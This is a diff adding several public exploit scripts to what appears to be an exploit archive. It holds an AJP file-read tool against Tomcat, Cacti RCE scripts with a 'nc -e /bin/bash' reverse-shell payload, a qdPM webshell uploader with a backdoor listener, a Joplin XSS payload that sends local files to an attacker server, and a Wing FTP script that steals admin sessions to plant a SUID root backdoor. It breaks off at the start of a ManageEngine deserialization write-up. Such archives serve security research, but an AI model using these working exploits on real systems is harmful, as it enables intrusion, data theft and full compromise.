+			data = self.serialize()
+			socket.send(data)
+			r = AjpResponse.receive(stream)
+			while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
+				r = AjpResponse.receive(stream)
+
+			if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
+				break
+class AjpForwardRequest(object):
+	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
+	REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
+	# server == web server, container == servlet
+	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
+	COMMON_HEADERS = ["SC_REQ_ACCEPT",
+		"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
+		"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
+		"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
+	]
+	ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
+	def __init__(self, data_direction=None):
+		self.prefix_code = 0x02
+		self.method = None
+		self.protocol = None
+		self.req_uri = None
+		self.remote_addr = None
+		self.remote_host = None
+		self.server_name = None
+		self.server_port = None
+		self.is_ssl = None
+		self.num_headers = None
+		self.request_headers = None
+		self.attributes = None
+		self.data_direction = data_direction
+	def pack_headers(self):
+		self.num_headers = len(self.request_headers)
+		res = ""
+		res = struct.pack(">h", self.num_headers)
+		for h_name in self.request_headers:
+			if h_name.startswith("SC_REQ"):
+				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
+				res += struct.pack("BB", 0xA0, code)
+			else:
+				res += pack_string(h_name)
+
+			res += pack_string(self.request_headers[h_name])
+		return res
+
+	def pack_attributes(self):
+		res = b""
+		for attr in self.attributes:
+			a_name = attr['name']
+			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
+			res += struct.pack("b", code)
+			if a_name == "req_attribute":
+				aa_name, a_value = attr['value']
+				res += pack_string(aa_name)
+				res += pack_string(a_value)
+			else:
+				res += pack_string(attr['value'])
+		res += struct.pack("B", 0xFF)
+		return res
+	def serialize(self):
+		res = ""
+		res = struct.pack("bb", self.prefix_code, self.method)
+		res += pack_string(self.protocol)
+		res += pack_string(self.req_uri)
+		res += pack_string(self.remote_addr)
+		res += pack_string(self.remote_host)
+		res += pack_string(self.server_name)
+		res += struct.pack(">h", self.server_port)
+		res += struct.pack("?", self.is_ssl)
+		res += self.pack_headers()
+		res += self.pack_attributes()
+		if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
+			header = struct.pack(">bbh", 0x12, 0x34, len(res))
+		else:
+			header = struct.pack(">bbh", 0x41, 0x42, len(res))
+		return header + res
+	def parse(self, raw_packet):
+		stream = StringIO(raw_packet)
+		self.magic1, self.magic2, data_len = unpack(stream, "bbH")
+		self.prefix_code, self.method = unpack(stream, "bb")
+		self.protocol = unpack_string(stream)
+		self.req_uri = unpack_string(stream)
+		self.remote_addr = unpack_string(stream)
+		self.remote_host = unpack_string(stream)
+		self.server_name = unpack_string(stream)
+		self.server_port = unpack(stream, ">h")
+		self.is_ssl = unpack(stream, "?")
+		self.num_headers, = unpack(stream, ">H")
+		self.request_headers = {}
+		for i in range(self.num_headers):
+			code, = unpack(stream, ">H")
+			if code > 0xA000:
+				h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
+			else:
+				h_name = unpack(stream, "%ds" % code)
+				stream.read(1) # \0
+			h_value = unpack_string(stream)
+			self.request_headers[h_name] = h_value
+	def send_and_receive(self, socket, stream, save_cookies=False):
+		res = []
+		i = socket.sendall(self.serialize())
+		if self.method == AjpForwardRequest.POST:
+			return res
+
+		r = AjpResponse.receive(stream)
+		assert r.prefix_code == AjpResponse.SEND_HEADERS
+		res.append(r)
+		if save_cookies and 'Set-Cookie' in r.response_headers:
+			self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
+
+		# read body chunks and end response packets
+		while True:
+			r = AjpResponse.receive(stream)
+			res.append(r)
+			if r.prefix_code == AjpResponse.END_RESPONSE:
+				break
+			elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
+				continue
+			else:
+				raise NotImplementedError
+				break
+
+		return res
+
+class AjpResponse(object):
+	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
+	COMMON_SEND_HEADERS = [
+			"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
+			"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
+			]
+	def parse(self, stream):
+		# read headers
+		self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
+
+		if self.prefix_code == AjpResponse.SEND_HEADERS:
+			self.parse_send_headers(stream)
+		elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
+			self.parse_send_body_chunk(stream)
+		elif self.prefix_code == AjpResponse.END_RESPONSE:
+			self.parse_end_response(stream)
+		elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
+			self.parse_get_body_chunk(stream)
+		else:
+			raise NotImplementedError
+
+	def parse_send_headers(self, stream):
+		self.http_status_code, = unpack(stream, ">H")
+		self.http_status_msg = unpack_string(stream)
+		self.num_headers, = unpack(stream, ">H")
+		self.response_headers = {}
+		for i in range(self.num_headers):
+			code, = unpack(stream, ">H")
+			if code <= 0xA000: # custom header
+				h_name, = unpack(stream, "%ds" % code)
+				stream.read(1) # \0
+				h_value = unpack_string(stream)
+			else:
+				h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
+				h_value = unpack_string(stream)
+			self.response_headers[h_name] = h_value
+
+	def parse_send_body_chunk(self, stream):
+		self.data_length, = unpack(stream, ">H")
+		self.data = stream.read(self.data_length+1)
+
+	def parse_end_response(self, stream):
+		self.reuse, = unpack(stream, "b")
+
+	def parse_get_body_chunk(self, stream):
+		rlen, = unpack(stream, ">H")
+		return rlen
+
+	@staticmethod
+	def receive(stream):
+		r = AjpResponse()
+		r.parse(stream)
+		return r
+
+import socket
+
+def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
+	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
+	fr.method = method
+	fr.protocol = "HTTP/1.1"
+	fr.req_uri = req_uri
+	fr.remote_addr = target_host
+	fr.remote_host = None
+	fr.server_name = target_host
+	fr.server_port = 80
+	fr.request_headers = {
+		'SC_REQ_ACCEPT': 'text/html',
+		'SC_REQ_CONNECTION': 'keep-alive',
+		'SC_REQ_CONTENT_LENGTH': '0',
+		'SC_REQ_HOST': target_host,
+		'SC_REQ_USER_AGENT': 'Mozilla',
+		'Accept-Encoding': 'gzip, deflate, sdch',
+		'Accept-Language': 'en-US,en;q=0.5',
+		'Upgrade-Insecure-Requests': '1',
+		'Cache-Control': 'max-age=0'
+	}
+	fr.is_ssl = False
+	fr.attributes = []
+	return fr
+
+class Tomcat(object):
+	def __init__(self, target_host, target_port):
+		self.target_host = target_host
+		self.target_port = target_port
+
+		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+		self.socket.connect((target_host, target_port))
+		self.stream = self.socket.makefile("rb", bufsize=0)
+
+	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
+		self.req_uri = req_uri
+		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
+		print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
+		if user is not None and password is not None:
+			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
+		for h in headers:
+			self.forward_request.request_headers[h] = headers[h]
+		for a in attributes:
+			self.forward_request.attributes.append(a)
+		responses = self.forward_request.send_and_receive(self.socket, self.stream)
+		if len(responses) == 0:
+			return None, None
+		snd_hdrs_res = responses[0]
+		data_res = responses[1:-1]
+		if len(data_res) == 0:
+			print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
+		return snd_hdrs_res, data_res
+
+'''
+javax.servlet.include.request_uri
+javax.servlet.include.path_info
+javax.servlet.include.servlet_path
+'''
+
+import argparse
+parser = argparse.ArgumentParser()
+parser.add_argument("target", type=str, help="Hostname or IP to attack")
+parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
+parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
+args = parser.parse_args()
+t = Tomcat(args.target, args.port)
+_,data = t.perform_request('/asdf',attributes=[
+    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
+    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
+    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
+    ])
+print('----------------------------')
+print("".join([d.data for d in data]))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48144.py b/exploits/multiple/webapps/48144.py
new file mode 100755
index 000000000..ace70ac94
--- /dev/null
+++ b/exploits/multiple/webapps/48144.py
@@ -0,0 +1,99 @@
+#!/usr/bin/python3
+
+# Exploit Title: Cacti v1.2.8 Remote Code Execution
+# Date: 03/02/2020
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://cacti.net/
+# Version: v1.2.8
+# Tested on: CentOS 7.3 / PHP 7.1.33
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+
+if len(sys.argv) != 6:
+    print("[~] Usage : ./Cacti-exploit.py url username password ip port")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+def login(token):
+    login_info = {
+    "login_username": username,
+    "login_password": password,
+    "action": "login",
+    "__csrf_magic": token
+    }
+    login_request = request.post(url+"/index.php", login_info)
+    login_text = login_request.text
+    if "Invalid User Name/Password Please Retype" in login_text:
+        return False
+    else:
+        return True
+
+def enable_guest(token):
+    request_info = {
+    "id": "3",
+    "section25": "on",
+    "section7": "on",
+    "tab": "realms",
+    "save_component_realm_perms": 1,
+    "action": "save",
+    "__csrf_magic": token
+    }
+    enable_request = request.post(url+"/user_admin.php?header=false", request_info)
+    if enable_request:
+        return True
+    else:
+        return False
+
+def send_exploit():
+    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
+    cookies = {'Cacti': quote(payload)}
+    requests.get(url+"/graph_realtime.php?action=init", cookies=cookies)
+
+request = requests.session()
+print("[+]Retrieving login CSRF token")
+page = request.get(url+"/index.php")
+html_content = page.text
+soup = BeautifulSoup(html_content, "html5lib")
+token = soup.findAll('input')[0].get("value")
+if token:
+    print("[+]Token Found : %s" % token)
+    print("[+]Sending creds ..")
+    login_status = login(token)
+    if login_status:
+        print("[+]Successfully LoggedIn")
+        print("[+]Retrieving CSRF token ..")
+        page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms")
+        html_content = page.text
+        soup = BeautifulSoup(html_content, "html5lib")
+        token = soup.findAll('input')[1].get("value")
+        if token:
+            print("[+]Making some noise ..")
+            guest_realtime = enable_guest(token)
+            if guest_realtime:
+                print("[+]Sending malicous request, check your nc ;)")
+                send_exploit()
+            else:
+                print("[-]Error while activating the malicous account")
+
+        else:
+            print("[-] Unable to retrieve CSRF token from admin page!")
+            exit()
+
+    else:
+        print("[-]Cannot Login!")
+else:
+    print("[-] Unable to retrieve CSRF token!")
+    exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48145.py b/exploits/multiple/webapps/48145.py
new file mode 100755
index 000000000..fcdf13697
--- /dev/null
+++ b/exploits/multiple/webapps/48145.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
+# Date: 03/02/2020
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://cacti.net/
+# Version: v1.2.8
+# Tested on: CentOS 7.3 / PHP 7.1.33
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+
+if len(sys.argv) != 4:
+    print("[~] Usage : ./Cacti-exploit.py url ip port")
+    exit()
+
+url = sys.argv[1]
+ip = sys.argv[2]
+port = sys.argv[3]
+
+def send_exploit(url):
+    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
+    cookies = {'Cacti': quote(payload)}
+    path = url+"/graph_realtime.php?action=init"
+    req = requests.get(path)
+    if req.status_code == 200 and "poller_realtime.php" in req.text:
+        print("[+] File Found and Guest is enabled!")
+        print("[+] Sending malicous request, check your nc ;)")
+        requests.get(path, cookies=cookies)
+    else:
+        print("[+] Error while requesting the file!")
+
+send_exploit(url)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48146.py b/exploits/multiple/webapps/48146.py
new file mode 100755
index 000000000..6f7af4c90
--- /dev/null
+++ b/exploits/multiple/webapps/48146.py
@@ -0,0 +1,183 @@
+#!/usr/bin/python
+
+#-------------------------------------------------------------------------------------
+# Title:	qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)
+# Author:	Tobin Shields (@TobinShields)
+#
+# Description:	This is an exploit to automatically upload a PHP web shell to
+#				the qdPM platform via the "upload a profile photo" feature.
+#				This method also bypasses the fix put into place from a previous CVE
+#
+# Usage:		In order to leverage this exploit, you must know the credentials of
+#				at least one user. Then, you should modify the values highlighted below.
+#				You will also need a .php web shell payload to upload. This exploit
+#				was built and tested using the PHP script built by pentestmonkey:
+#				https://github.com/pentestmonkey/php-reverse-shell
+#-------------------------------------------------------------------------------------
+
+# Imports
+from requests import Session
+from bs4 import BeautifulSoup as bs
+import socket
+from multiprocessing import Process
+import time
+
+# CHANGE THESE VALUES-----------------------------------------------------------------
+login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"
+username = "jsmith@example.com"
+password = "Pa$$w0rd"
+payload = "/path/to/payload.php"
+listner_port = 1234 			# This should match your PHP payload
+connection_delay = 2 			# Increase this value if you have a slow connection and are experiencing issues
+# ------------------------------------------------------------------------------------
+
+# Build the myAccout URL from the provided URL
+myAccount_url = login_url.replace("login", "myAccount")
+
+# PROGRAM FUNCTIONS -----------------------------------------------------------------
+# Utility function for anytime a page needs to be requested and parsed via bs4
+def requestAndSoupify(url):
+	page = s.get(url)
+	soup = bs(page.content, "html.parser")
+	return soup
+
+# Function to log into the application, and supply the correct username/password
+def login(url):
+	# Soupify the login page
+	login_page = requestAndSoupify(url)
+	# Grab the csrf token
+	token = login_page.find("input", {"name": "login[_csrf_token]"})["value"]
+	# Build the POST values
+	login_data = {
+		"login[email]": username,
+		"login[password]": password,
+		"login[_csrf_token]": token
+	}
+	# Send the login request
+	s.post(login_url, login_data)
+
+# Function to get the base values for making a POST request from the myAccount page
+def getPOSTValues():
+	myAccount_soup = requestAndSoupify(myAccount_url)
+	# Search for the 'base' POST data needed for any requests
+	u_id 	= myAccount_soup.find("input", {"name": "users[id]"})["value"]
+	token 	= myAccount_soup.find("input", {"name": "users[_csrf_token]"})["value"]
+	u_name 	= myAccount_soup.find("input", {"name": "users[name]"})["value"]
+	u_email = myAccount_soup.find("input", {"name": "users[email]"})["value"]
+	# Populate the POST data object
+	post_data = {
+		"users[id]": u_id,
+		"users[_csrf_token]": token,
+		"users[name]": u_name,
+		"users[email]": u_email,
+		"users[culture]": "en" # Keep the language English--change this for your victim locale
+	}
+	return post_data
+
+# Function to remove the a file from the server by exploiting the CVE
+def removeFile(file_to_remove):
+	# Get base POST data
+	post_data = getPOSTValues()
+	# Add the POST data to remove a file
+	post_data["users[photo_preview]"] = file_to_remove
+	post_data["users[remove_photo]"] = 1
+	# Send the POST request to the /update page
+	s.post(myAccount_url + "/update", post_data)
+	# Print update to user
+	print("Removing " + file_to_remove)
+	# Sleep to account for slow connections
+	time.sleep(connection_delay)
+
+# Function to upload the payload to the server
+def uploadPayload(payload):
+	# Get payload name from supplied URI
+	payload_name = payload.rsplit('/', 1)[1]
+	# Request page and get base POST files
+	post_data = getPOSTValues()
+	# Build correct payload POST header by dumping the contents
+	payload_file = {"users[photo]": open(payload, 'rb')}
+	# Send POST request with base data + file
+	s.post(myAccount_url + "/update", post_data, files=payload_file)
+	# Print update to user
+	print("Uploading " + payload_name)
+	# Sleep for slow connections
+	time.sleep(connection_delay)
+
+# A Function to find the name of the newly uploaded payload
+	# NOTE: We have to do this because qdPM adds a random number to the uploaded file
+	# EX: webshell.php becomes 1584009-webshell.php
+def getPayloadURL():
+	myAccount_soup = requestAndSoupify(myAccount_url)
+	payloadURL = myAccount_soup.find("img", {"class": "user-photo"})["src"]
+	return payloadURL
+
+# Function to handle creating the webshell listener and issue commands to the victim
+def createBackdoorListener():
+	# Set up the listening socket on localhost
+	server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	host = "0.0.0.0"
+	port = listner_port # Specified at the start of this script by user
+	server_socket.bind((host, port))
+	server_socket.listen(2)
+	victim, address = server_socket.accept()
+	# Print update to user once the connection is made
+	print("Received connection from: " + str(address))
+
+	# Simulate a terminal and build a pusdo-prompt using the victem IP
+	prompt = "backdoor@" + str(address[0]) + ":~$ "
+
+	# Grab the first response from the victim--this is usually OS info
+	response = victim.recv(1024).decode('utf-8')
+	print(response)
+	print("\nType 'exit' at any time to close the connection")
+
+	# Maintain the connection and send data back and forth
+	while True:
+		# Grab the command from the user
+		command = input(prompt)
+		# If they type "exit" then close the socket
+		if 'exit' in command:
+			victim.close()
+			server_socket.close()
+			print("Disconnecting, please wait...")
+			break
+		# For all other commands provided
+		else:
+			# Encode the command to be properly sent via the socket & send the command
+			command = str.encode(command + "\n")
+			victim.send(command)
+			# Grab the response to the command and decode it
+			response = victim.recv(1024).decode('utf-8')
+			# For some odd reason you have to hit "enter" after sending the command to receive the output
+			# TODO: Fix this so it works on a single send? Although it might just be the PHP webshell
+			victim.send(str.encode("\n"))
+			response = victim.recv(1024).decode('utf-8')
+			# If a command returns nothing (i.e. a 'cd' command, it prints a "$"
+			# This is a confusing output so it will omit this output
+			if response.strip() != "$":
+				print(response)
+
+# Trigger the PHP to run by making a page request
+def triggerShell(s, payloadURL):
+	pageReq = s.get(payloadURL)
+
+# MAIN FUNCTION ----------------------------------------------------------------------
+# The main function of this program establishes a unique session to issue the various POST requests
+with Session() as s:
+	# Login as know user
+	login(login_url)
+	# Remove Files
+		# You may need to modify this list if you suspect that there are more .htaccess files
+		# However, the default qdPM installation just had these two
+	files_to_remove = [".htaccess", "../.htaccess"]
+	for f in files_to_remove:
+		removeFile(f)
+	# Upload payload
+	uploadPayload(payload)
+	# Get the payload URL
+	payloadURL = getPayloadURL()
+	# Start a thread to trigger the script with a web request
+	process = Process(target=triggerShell, args=(s, payloadURL))
+	process.start()
+	# Create the backdoor listener and wait for the above request to trigger
+	createBackdoorListener()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48147.txt b/exploits/multiple/webapps/48147.txt
new file mode 100644
index 000000000..6438c82bf
--- /dev/null
+++ b/exploits/multiple/webapps/48147.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting
+# Exploit Author: Javier Olmedo
+# Date: 2020-02-27
+# Vendor: Laurent Cozic
+# Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip
+# Affected Version: 1.0.184 and before
+# Patched Version: 1.0.185
+# Category: Remote
+# Platform: Windows
+# Tested on: Windows 10 Pro
+# CWE: https://cwe.mitre.org/data/definitions/79.html
+# CVE: 2020-9038
+# References:
+# https://github.com/JavierOlmedo/CVE-2020-9038
+# https://github.com/laurent22/joplin/commit/3db47b575b9cb0a765da3d283baa2c065df0d0bc
+ 
+# 1. Technical Description
+# Joplin Desktop version 1.0.184 and before are affected by Cross-Site Scripting
+# vulnerability through the malicious note. This allows a malicious user
+# read arbitrary files of system.
+ 
+# 2. Proof Of Concept (PoC)
+# 2.1 Start a webserver to receive the connection in evil machine (you can use a python server).
+
+python -m SimpleHTTPServer 8080
+
+# 2.2 Upload exploit.js file to your web server (Change your IP, PORT and USER)
+
+function readTextFile(file){
+    var rawFile = new XMLHttpRequest();
+    rawFile.open("GET", file, false);
+    rawFile.onreadystatechange = function (){
+        if(rawFile.readyState === 4){
+            if(rawFile.status === 200 || rawFile.status == 0){
+                allText = rawFile.responseText;
+                //alert(allText);
+                var img = document.createElement('img');
+                img.src = "http://[IP:PORT]/" + allText;
+                document.body.appendChild(img)
+            }
+        }
+    }
+    rawFile.send(null);
+}
+readTextFile("file:///C:/Users/[USER]/Desktop/SECRET.TXT");
+//readTextFile("file:///C:/Windows/System32/drivers/etc/hosts");
+
+# 2.3 Create a secret.txt file with any content in victim desktop.
+
+# 2.4 Create a New note in Joplin Desktop and copy next payload in note body content (change your base64).
+
+<p><img src onerror=eval(atob("dmFyIHNjcmlwdD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3J
+pcHQiKTtzY3JpcHQudHlwZT0idGV4dC9qYXZhc2NyaXB0IjtzY3JpcHQuc3JjPSJodHRwOi8vMTkyLjE2O
+C4xMDAuNjk6ODA4MC9leHBsb2l0LmpzIjtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCI
+pWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk="))></p>
+
+# 2.5 Your web server will receive a request with the contents of the secret.txt file
+
+Serving HTTP on 0.0.0.0 port 8080 ...
+192.168.100.250 - - [02/Feb/2020 08:27:22] "GET /exploit.js HTTP/1.1" 200 -
+192.168.100.250 - - [02/Feb/2020 08:27:27] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
+
+# 3. Timeline
+# 20, december 2019 - [RESEARCHER] Discover
+# 20, december 2019 - [RESEARCHER] Report to vendor support
+# 21, december 2019 - [DEVELOPER]  Recognized vulnerability
+# 13, february 2020 - [DEVELOPER]  Patched vulnerability
+# 27, february 2020 - [RESEARCHER] Public disclosure
+
+# 4. Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48154.sh b/exploits/multiple/webapps/48154.sh
new file mode 100755
index 000000000..a56c477dd
--- /dev/null
+++ b/exploits/multiple/webapps/48154.sh
@@ -0,0 +1,99 @@
+# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
+# Google Dork: intitle:"Wing FTP Server - Web"
+# Date: 2020-03-03
+# Exploit Author: Cary Hooper
+# Vendor Homepage: https://www.wftpserver.com
+# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
+# Version: v6.2.5 and prior
+# Tested on: Ubuntu 18.04
+# CVE: N/A
+
+# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
+# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
+# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
+# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
+# https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)
+
+
+
+#!/bin/bash
+
+echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
+echo 'Exploit by Cary Hooper (@nopantrootdance)'
+
+function writeBackdoor() {
+	#this function creates a backdoor program (executes bash)
+	echo "    Writing backdoor in $1"
+	echo '#include <stdio.h>' > $1/foobarh00p.c
+	echo '#include <sys/types.h>' >> $1/foobarh00p.c
+	echo '#include <unistd.h>' >> $1/foobarh00p.c
+	echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
+	gcc -w $1/foobarh00p.c -o $1/foobarh00p
+}
+
+function makeRequest() {
+	#Executes Lua command in admin panel to set the suid bit/chown on our backdoor
+	#Change owner to root
+	curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html"  >/dev/null 2>/dev/null
+	#Make SUID
+	curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html"  >/dev/null 2>/dev/null
+}
+
+directories=( "/tmp" "/var/tmp" "/dev/shm" )
+for dir in "${directories[@]}"
+do
+	#Check if directories are writeable
+	if [ -w $dir ]
+	then 
+		echo "[!] Writeable directory found: $dir"
+		export backdoordir=$dir
+		break
+	else 
+		echo "    $dir is not writeable..."; fi
+done
+
+writeBackdoor $backdoordir
+
+#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
+echo "    Finding the wftpserver directory"
+export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
+if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found.  Consider looking manually."; exit 1; fi
+#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary.  Change the variable below and comment out the code above.  
+#export sessiondir="/opt/wftpserver/session_admin"
+
+#While loop to wait for an admin session to be established.  
+echo "    Waiting for a Wing FTP admin to log in.  This may take a while..."
+count=0
+while : ; do
+	if [ "$(ls -A $sessiondir)" ]; then
+		#If a session file exists, the UID_ADMIN cookie is the name of the file.
+		echo "[!] An administrator logged in... stealing their session."
+		export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
+		export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
+		echo "    Changing IP restrictions on the cookie..."
+		cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
+		cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
+		rm $backdoordir/$cookie.lua
+		echo "[!] Successfully stole session."
+		#Once found, make the malicious curl request
+		export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)
+		echo "    Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
+		makeRequest $cookie $urldir
+		break
+	else
+		#Checks every 10 seconds.  Outputs date to terminal for user feedback purposes only.
+		sleep 10
+		let "count+=1"
+		if [ $count -eq 10 ]; then date; fi
+		echo "..."
+	fi
+done
+
+#Check if backdoor was created correctly
+if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo "    Something went wrong.  Backdoor is not SUID"; exit 1; fi
+if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo "    Something went wrong.  Backdoor is not owned by root"; exit 1; fi
+
+echo "    Backdoor is now SUID owned by root."
+echo "[!] Executing backdoor. Cross your fingers..."
+#Execute the backdoor... root!
+$backdoordir/foobarh00p
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48176.py b/exploits/multiple/webapps/48176.py
new file mode 100755
index 000000000..8c7c7ff71
--- /dev/null
+++ b/exploits/multiple/webapps/48176.py
@@ -0,0 +1,484 @@
+#!/usr/bin/python3
+"""
+ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
+
+Download: https://www.manageengine.com/products/desktop-central/download-free.html
+File ...: ManageEngine_DesktopCentral_64bit.exe
+SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
+Found by: mr_me
+Date ...: 2019-12-12
+Class ..: CWE-502
+CVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
+
+## Summary:
+
+An unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.
+
+## Vulnerability Analysis:
+
+In the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.
+
+```
+<servlet>
+    <servlet-name>CewolfServlet</servlet-name>
+    <servlet-class>de.laures.cewolf.CewolfRenderer</servlet-class>
+
+    <init-param>
+        <param-name>debug</param-name>
+        <param-value>false</param-value>
+    </init-param>
+    <init-param>
+        <param-name>overliburl</param-name>
+        <param-value>/js/overlib.js</param-value>
+    </init-param>
+    <init-param>
+        <param-name>storage</param-name>
+        <param-value>de.laures.cewolf.storage.FileStorage</param-value>
+    </init-param>
+
+    <load-on-startup>1</load-on-startup>
+</servlet>
+
+    ...
+
+<servlet-mapping>
+    <servlet-name>CewolfServlet</servlet-name>
+    <url-pattern>/cewolf/*</url-pattern>
+</servlet-mapping>
+```
+
+This servlet, contains the following code:
+
+```
